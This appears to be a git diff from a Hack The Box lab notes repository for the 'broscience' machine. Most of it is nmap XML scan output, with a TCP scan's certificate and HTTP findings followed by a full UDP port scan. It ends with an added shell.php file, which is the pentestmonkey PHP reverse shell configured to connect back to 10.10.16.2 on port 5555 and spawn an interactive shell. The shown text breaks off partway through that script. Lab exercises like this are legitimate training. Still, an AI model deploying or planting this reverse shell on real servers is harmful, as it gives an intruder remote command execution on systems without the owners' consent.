<elem key="value">7C:BC:C5:22:C8:6E:50:5B:21:11:E5:C3:A1:93:6E:2B:68:BF:80:5A</elem>
</table>
<table>
<elem key="name">X509v3 Basic Constraints</elem>
<elem key="value">CA:TRUE</elem>
<elem key="critical">true</elem>
</table>
</table>
<elem key="sig_algo">sha256WithRSAEncryption</elem>
<table key="validity">
<elem key="notBefore">2022-07-14T19:48:36</elem>
<elem key="notAfter">2023-07-14T19:48:36</elem>
</table>
<elem key="md5">5328ddd62f3429d11d26ae8a68d86e0c</elem>
<elem key="sha1">20568d0d9e4109cde5a22021fe3f349c40d8d75b</elem>
<elem key="pem">-&#45;&#45;&#45;&#45;BEGIN CERTIFICATE-&#45;&#45;&#45;&#45;&#xa;MIIF0zCCA7ugAwIBAgIUD+qpK08oB9Kng1mp3mIxnO21+s4wDQYJKoZIhvcNAQEL&#xa;BQAweTELMAkGA1UEBhMCQVQxDzANBgNVBAcMBlZpZW5uYTETMBEGA1UECgwKQnJv&#xa;U2NpZW5jZTEXMBUGA1UEAwwOYnJvc2NpZW5jZS5odGIxKzApBgkqhkiG9w0BCQEW&#xa;HGFkbWluaXN0cmF0b3JAYnJvc2NpZW5jZS5odGIwHhcNMjIwNzE0MTk0ODM2WhcN&#xa;MjMwNzE0MTk0ODM2WjB5MQswCQYDVQQGEwJBVDEPMA0GA1UEBwwGVmllbm5hMRMw&#xa;EQYDVQQKDApCcm9TY2llbmNlMRcwFQYDVQQDDA5icm9zY2llbmNlLmh0YjErMCkG&#xa;CSqGSIb3DQEJARYcYWRtaW5pc3RyYXRvckBicm9zY2llbmNlLmh0YjCCAiIwDQYJ&#xa;KoZIhvcNAQEBBQADggIPADCCAgoCggIBAKcyX2E/e8BqyRU6FoKOWoWFJo6nLHhK&#xa;B0wNgmPrcUZ5ycizPc+6ereoFgzZmj5qI0lBW4ZZNn5m5nBcAlVxCC6qzT+vUY1N&#xa;j8VyC0seh90AJYGXHylWOJoEl+a8UOrbirbkuvJNhwG6Eryo2enWgmSkyHHIjH2d&#xa;mS29vmydxAJafTR04IQkbmyfhbuYMEl5aZZQCS+ZuA+5MRCWbpZg8E02O5zAWSa6&#xa;Kc3W1DnjEFJNECY9fwiga842sR7QxQYaJN30bBQAG0DJgay6Af+7cB82czIt8aRa&#xa;gcrkrCeBtWc6t0VXyCOAqeVSghqzYhZuAbGQaQJN/lgcVL2Zky8Jte70EGW9Lsq1&#xa;m6o92goMCfEFKxKieD0niVtOW1v/mkuwMG7R6VRY9D6ySn9jTK0WmmBYX0V145oY&#xa;BU8WUbhAqZAPb/vsayGmVsKaX6ruNUO0t07ZhMjO8GO1mBh507+3YRtYztwueCOL&#xa;7e3N5jdOWXIauGXQafo9jhuhletktmeFs5ytM5gTf0X7R+Ink2coum5TI/KVK2WQ&#xa;Lb+oSOkgqbrVpIyr3YrpqW1NnyekPweUbC/n4/uSZv1+9QHjGJ3aQtWmf73JFCkG&#xa;BBeirNufb4/imdX8GZpkJs35kcL32gRyfpLHF9gyEIbW9NEnX1kpg8VfCrUJOjR5&#xa;PFedjVtw4G/bAgMBAAGjUzBRMB0GA1UdDgQWBBR8vMUiyG5QWyER5cOhk24raL+A&#xa;WjAfBgNVHSMEGDAWgBR8vMUiyG5QWyER5cOhk24raL+AWjAPBgNVHRMBAf8EBTAD&#xa;AQH/MA0GCSqGSIb3DQEBCwUAA4ICAQCjEIzE+EpLeuGgCY18AREB4t2xSwqiYgqC&#xa;H+gRoSbQ64xpNrbjOLBeyB4b1FotYdquKiaiFs7P1taY7hQiyHGFk4HOJlhyBnRK&#xa;atjKt6ZE24yWgsGikGx0D57SYTeJwhqafYRnNuqNPCvnvhO1zQjMTl03T30PvSeb&#xa;TDfcgd3rzG72w4S/zL59Vr4kr9Js01LpjDgt2Kyd5zW4RZKHA+RdIE+ePJXZaTwj&#xa;+Ko8QzNKwt3qDlOXAV5MiqUfKPHyg6Rzq8i5bKNMpwU1UxYGpE64T0t+IfhiOX/O&#xa;r/dW59nLXoHTGhqwAStFCzCqu+6Jfod2wFb+9Ty5rctVIpHw2XMEKfC8DSewvCc6&#xa;QjMMMCRc2vpkc/YHberK+VYb8eVf4GcKzq6ns341jZ0FAwNEpB6tY6eeGovOLeeO&#xa;P5ONg9XAO8EipKj/tJhmIZ2G6GHKh1Enj7zg1DoGCMttLeaC5lMzaxAWd
wUplaBm&#xa;w/+0dzFuuJL+XlxQIrVpGpmJOmBvPq/WvzU6ZFi4UwbHkow5EVvUPvW2GmTVecpx&#xa;Or1X3z3W5aGvj1tH2OcqY5WTcgDNoBtFc3tob8xNd7KB88DQfNbSHuFShKymwAVK&#xa;bcb0jeUT6YRF6NEmoLu80xyrro+Ejt1fLd3WE6q4+BXvhdj62OPtt5ue2rEhycgc&#xa;dfC1SCd82A==&#xa;-&#45;&#45;&#45;&#45;END CERTIFICATE-&#45;&#45;&#45;&#45;&#xa;</elem>
</script><script id="http-title" output="BroScience : Home"><elem key="title">BroScience : Home</elem>
</script><script id="http-cookie-flags" output="&#xa; /: &#xa; PHPSESSID: &#xa; httponly flag not set"><table key="/">
<table key="PHPSESSID">
<elem>httponly flag not set</elem>
</table>
</table>
</script><script id="http-methods" output="&#xa; Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
</table>
</script></port>
</ports>
<os><portused state="open" proto="tcp" portid="22"/>
<portused state="closed" proto="tcp" portid="1"/>
<osmatch name="Linux 4.15 - 5.6" accuracy="94" line="67238">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="4.X" accuracy="94"><cpe>cpe:/o:linux:linux_kernel:4</cpe></osclass>
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="94"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.3 - 5.4" accuracy="94" line="68140">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="94"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 2.6.32" accuracy="94" line="55653">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="94"><cpe>cpe:/o:linux:linux_kernel:2.6.32</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.0 - 5.3" accuracy="93" line="68082">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.1" accuracy="93" line="62917">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:3.1</cpe></osclass>
</osmatch>
<osmatch name="Linux 3.2" accuracy="93" line="64664">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:3.2</cpe></osclass>
</osmatch>
<osmatch name="AXIS 210A or 211 Network Camera (Linux 2.6.17)" accuracy="92" line="61815">
<osclass type="webcam" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="92"><cpe>cpe:/o:linux:linux_kernel:2.6.17</cpe></osclass>
<osclass type="webcam" vendor="AXIS" osfamily="embedded" accuracy="92"><cpe>cpe:/h:axis:210a_network_camera</cpe><cpe>cpe:/h:axis:211_network_camera</cpe></osclass>
</osmatch>
<osmatch name="Crestron XPanel control system" accuracy="91" line="19543">
<osclass type="specialized" vendor="Crestron" osfamily="2-Series" accuracy="91"><cpe>cpe:/o:crestron:2_series</cpe></osclass>
</osmatch>
<osmatch name="Linux 5.4" accuracy="91" line="68194">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="91"><cpe>cpe:/o:linux:linux_kernel:5.4</cpe></osclass>
</osmatch>
<osmatch name="Linux 2.6.39 - 3.2" accuracy="90" line="58264">
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="90"><cpe>cpe:/o:linux:linux_kernel:2.6</cpe></osclass>
<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="3.X" accuracy="90"><cpe>cpe:/o:linux:linux_kernel:3</cpe></osclass>
</osmatch>
<osfingerprint fingerprint="SCAN(V=7.93%E=4%D=2/1%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63DA9845%P=x86_64-pc-linux-gnu)&#xa;SEQ(SP=102%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)&#xa;OPS(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)&#xa;WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)&#xa;ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)&#xa;T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)&#xa;T2(R=N)&#xa;T3(R=N)&#xa;T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;U1(R=N)&#xa;IE(R=Y%DFI=N%TG=40%CD=S)&#xa;"/>
</os>
<uptime seconds="2473002" lastboot="Wed Jan 4 02:53:31 2023"/>
<distance value="2"/>
<tcpsequence index="259" difficulty="Good luck!" values="9E48F436,31090BF2,6E8E0510,89FC0060,E58BE177,48723238"/>
<ipidsequence class="All zeros" values="0,0,0,0,0,0"/>
<tcptssequence class="1000HZ" values="9366B9FF,9366BA64,9366BAC8,9366BB2C,9366BB91,9366BBF5"/>
<trace port="1720" proto="tcp">
<hop ttl="1" ipaddr="10.10.16.1" rtt="93.25"/>
<hop ttl="2" ipaddr="10.10.11.195" rtt="93.24" host="broscience.htb"/>
</trace>
<times srtt="48493" rttvar="34121" to="184977"/>
</host>
<taskbegin task="NSE" time="1675270213"/>
<taskend task="NSE" time="1675270213"/>
<taskbegin task="NSE" time="1675270213"/>
<taskend task="NSE" time="1675270213"/>
<taskbegin task="NSE" time="1675270213"/>
<taskend task="NSE" time="1675270213"/>
<runstats><finished time="1675270213" timestr="Wed Feb 1 17:50:13 2023" summary="Nmap done at Wed Feb 1 17:50:13 2023; 1 IP address (1 host up) scanned in 34.82 seconds" elapsed="34.82" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>


@@ -0,0 +1,158 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Wed Feb 1 17:49:39 2023 as: nmap -vv -&#45;reason -Pn -T4 -sU -A -&#45;top-ports 100 -oN /home/kali/htb/broscience/results/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/broscience/results/scans/xml/_top_100_udp_nmap.xml 10.10.11.195 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sU -A -&#45;top-ports 100 -oN /home/kali/htb/broscience/results/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/broscience/results/scans/xml/_top_100_udp_nmap.xml 10.10.11.195" start="1675270179" startstr="Wed Feb 1 17:49:39 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="udp" protocol="udp" numservices="100" services="7,9,17,19,49,53,67-69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,631,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5353,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675270179"/>
<taskend task="NSE" time="1675270179"/>
<taskbegin task="NSE" time="1675270179"/>
<taskend task="NSE" time="1675270179"/>
<taskbegin task="NSE" time="1675270179"/>
<taskend task="NSE" time="1675270179"/>
<taskbegin task="UDP Scan" time="1675270179"/>
<taskend task="UDP Scan" time="1675270243" extrainfo="100 total ports"/>
<taskbegin task="Service scan" time="1675270243"/>
<taskprogress task="Service scan" time="1675270294" percent="2.94" remaining="1684" etc="1675271977"/>
<taskprogress task="Service scan" time="1675270325" percent="20.59" remaining="317" etc="1675270641"/>
<taskend task="Service scan" time="1675270359" extrainfo="34 services on 1 host"/>
<taskbegin task="Traceroute" time="1675270363"/>
<taskend task="Traceroute" time="1675270364"/>
<taskbegin task="Parallel DNS resolution of 1 host." time="1675270364"/>
<taskend task="Parallel DNS resolution of 1 host." time="1675270375"/>
<taskbegin task="NSE" time="1675270375"/>
<taskprogress task="NSE" time="1675270406" percent="98.93" remaining="1" etc="1675270406"/>
<taskprogress task="NSE" time="1675270436" percent="99.53" remaining="1" etc="1675270436"/>
<taskprogress task="NSE" time="1675270466" percent="99.89" remaining="1" etc="1675270466"/>
<taskend task="NSE" time="1675270470"/>
<taskbegin task="NSE" time="1675270470"/>
<taskend task="NSE" time="1675270472"/>
<taskbegin task="NSE" time="1675270472"/>
<taskend task="NSE" time="1675270472"/>
<host starttime="1675270179" endtime="1675270472"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.195" addrtype="ipv4"/>
<hostnames>
<hostname name="broscience.htb" type="PTR"/>
</hostnames>
<ports><port protocol="udp" portid="7"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="echo" method="table" conf="3"/></port>
<port protocol="udp" portid="9"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="discard" method="table" conf="3"/></port>
<port protocol="udp" portid="17"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="qotd" method="table" conf="3"/></port>
<port protocol="udp" portid="19"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="chargen" method="table" conf="3"/></port>
<port protocol="udp" portid="49"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="tacacs" method="table" conf="3"/></port>
<port protocol="udp" portid="53"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="domain" method="table" conf="3"/></port>
<port protocol="udp" portid="67"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="dhcps" method="table" conf="3"/></port>
<port protocol="udp" portid="68"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="dhcpc" method="table" conf="3"/></port>
<port protocol="udp" portid="69"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="tftp" method="table" conf="3"/></port>
<port protocol="udp" portid="80"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="http" method="table" conf="3"/></port>
<port protocol="udp" portid="88"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="kerberos-sec" method="table" conf="3"/></port>
<port protocol="udp" portid="111"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="rpcbind" method="table" conf="3"/></port>
<port protocol="udp" portid="120"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="cfdptkt" method="table" conf="3"/></port>
<port protocol="udp" portid="123"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="ntp" method="table" conf="3"/></port>
<port protocol="udp" portid="135"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="msrpc" method="table" conf="3"/></port>
<port protocol="udp" portid="136"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="profile" method="table" conf="3"/></port>
<port protocol="udp" portid="137"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="netbios-ns" method="table" conf="3"/></port>
<port protocol="udp" portid="138"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="netbios-dgm" method="table" conf="3"/></port>
<port protocol="udp" portid="139"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="netbios-ssn" method="table" conf="3"/></port>
<port protocol="udp" portid="158"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="pcmail-srv" method="table" conf="3"/></port>
<port protocol="udp" portid="161"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="snmp" method="table" conf="3"/></port>
<port protocol="udp" portid="162"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="snmptrap" method="table" conf="3"/></port>
<port protocol="udp" portid="177"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="xdmcp" method="table" conf="3"/></port>
<port protocol="udp" portid="427"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="svrloc" method="table" conf="3"/></port>
<port protocol="udp" portid="443"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="https" method="table" conf="3"/></port>
<port protocol="udp" portid="445"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="microsoft-ds" method="table" conf="3"/></port>
<port protocol="udp" portid="497"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="retrospect" method="table" conf="3"/></port>
<port protocol="udp" portid="500"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="isakmp" method="table" conf="3"/></port>
<port protocol="udp" portid="514"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="syslog" method="table" conf="3"/></port>
<port protocol="udp" portid="515"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="printer" method="table" conf="3"/></port>
<port protocol="udp" portid="518"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="ntalk" method="table" conf="3"/></port>
<port protocol="udp" portid="520"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="route" method="table" conf="3"/></port>
<port protocol="udp" portid="593"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="http-rpc-epmap" method="table" conf="3"/></port>
<port protocol="udp" portid="623"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="asf-rmcp" method="table" conf="3"/></port>
<port protocol="udp" portid="626"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="serialnumberd" method="table" conf="3"/></port>
<port protocol="udp" portid="631"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="ipp" method="table" conf="3"/></port>
<port protocol="udp" portid="996"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="vsinet" method="table" conf="3"/></port>
<port protocol="udp" portid="997"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="maitrd" method="table" conf="3"/></port>
<port protocol="udp" portid="998"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="puparp" method="table" conf="3"/></port>
<port protocol="udp" portid="999"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="applix" method="table" conf="3"/></port>
<port protocol="udp" portid="1022"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="exp2" method="table" conf="3"/></port>
<port protocol="udp" portid="1023"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="1025"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="blackjack" method="table" conf="3"/></port>
<port protocol="udp" portid="1026"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="win-rpc" method="table" conf="3"/></port>
<port protocol="udp" portid="1027"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="1028"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="ms-lsa" method="table" conf="3"/></port>
<port protocol="udp" portid="1029"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="solid-mux" method="table" conf="3"/></port>
<port protocol="udp" portid="1030"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="iad1" method="table" conf="3"/></port>
<port protocol="udp" portid="1433"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="ms-sql-s" method="table" conf="3"/></port>
<port protocol="udp" portid="1434"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="ms-sql-m" method="table" conf="3"/></port>
<port protocol="udp" portid="1645"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="radius" method="table" conf="3"/></port>
<port protocol="udp" portid="1646"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="radacct" method="table" conf="3"/></port>
<port protocol="udp" portid="1701"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="L2TP" method="table" conf="3"/></port>
<port protocol="udp" portid="1718"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="h225gatedisc" method="table" conf="3"/></port>
<port protocol="udp" portid="1719"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="h323gatestat" method="table" conf="3"/></port>
<port protocol="udp" portid="1812"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="radius" method="table" conf="3"/></port>
<port protocol="udp" portid="1813"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="radacct" method="table" conf="3"/></port>
<port protocol="udp" portid="1900"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="upnp" method="table" conf="3"/></port>
<port protocol="udp" portid="2000"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="cisco-sccp" method="table" conf="3"/></port>
<port protocol="udp" portid="2048"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="dls-monitor" method="table" conf="3"/></port>
<port protocol="udp" portid="2049"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="nfs" method="table" conf="3"/></port>
<port protocol="udp" portid="2222"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="msantipiracy" method="table" conf="3"/></port>
<port protocol="udp" portid="2223"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="rockwell-csp2" method="table" conf="3"/></port>
<port protocol="udp" portid="3283"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="netassistant" method="table" conf="3"/></port>
<port protocol="udp" portid="3456"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="IISrpc-or-vat" method="table" conf="3"/></port>
<port protocol="udp" portid="3703"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="adobeserver-3" method="table" conf="3"/></port>
<port protocol="udp" portid="4444"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="krb524" method="table" conf="3"/></port>
<port protocol="udp" portid="4500"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="nat-t-ike" method="table" conf="3"/></port>
<port protocol="udp" portid="5000"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="upnp" method="table" conf="3"/></port>
<port protocol="udp" portid="5060"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="sip" method="table" conf="3"/></port>
<port protocol="udp" portid="5353"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="zeroconf" method="table" conf="3"/></port>
<port protocol="udp" portid="5632"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="pcanywherestat" method="table" conf="3"/></port>
<port protocol="udp" portid="9200"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="wap-wsp" method="table" conf="3"/></port>
<port protocol="udp" portid="10000"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="ndmp" method="table" conf="3"/></port>
<port protocol="udp" portid="17185"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="wdbrpc" method="table" conf="3"/></port>
<port protocol="udp" portid="20031"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="bakbonenetvault" method="table" conf="3"/></port>
<port protocol="udp" portid="30718"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="31337"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="BackOrifice" method="table" conf="3"/></port>
<port protocol="udp" portid="32768"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="omad" method="table" conf="3"/></port>
<port protocol="udp" portid="32769"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="filenet-rpc" method="table" conf="3"/></port>
<port protocol="udp" portid="32771"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="sometimes-rpc6" method="table" conf="3"/></port>
<port protocol="udp" portid="32815"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="33281"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49152"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49153"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49154"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49156"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49181"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49182"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49185"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49186"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49188"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49190"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49191"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49192"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49193"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49194"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49200"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49201"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="65024"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
</ports>
<os><portused state="closed" proto="udp" portid="9"/>
<osfingerprint fingerprint="SCAN(V=7.93%E=4%D=2/1%OT=%CT=%CU=9%PV=Y%DS=2%DC=T%G=N%TM=63DA9948%P=x86_64-pc-linux-gnu)&#xa;SEQ(CI=Z%II=I)&#xa;SEQ(CI=Z)&#xa;T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)&#xa;IE(R=Y%DFI=N%T=40%CD=S)&#xa;"/>
</os>
<distance value="2"/>
<trace port="162" proto="udp">
<hop ttl="1" ipaddr="10.10.16.1" rtt="31.00"/>
<hop ttl="2" ipaddr="10.10.11.195" rtt="328.64" host="broscience.htb"/>
</trace>
<times srtt="86924" rttvar="98466" to="480788"/>
</host>
<taskbegin task="NSE" time="1675270472"/>
<taskend task="NSE" time="1675270472"/>
<taskbegin task="NSE" time="1675270472"/>
<taskend task="NSE" time="1675270472"/>
<taskbegin task="NSE" time="1675270472"/>
<taskend task="NSE" time="1675270472"/>
<runstats><finished time="1675270472" timestr="Wed Feb 1 17:54:32 2023" summary="Nmap done at Wed Feb 1 17:54:32 2023; 1 IP address (1 host up) scanned in 293.59 seconds" elapsed="293.59" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

116
HTB/broscience/shell.php Normal file

@@ -0,0 +1,116 @@
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.16.2';
$port = 5555;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
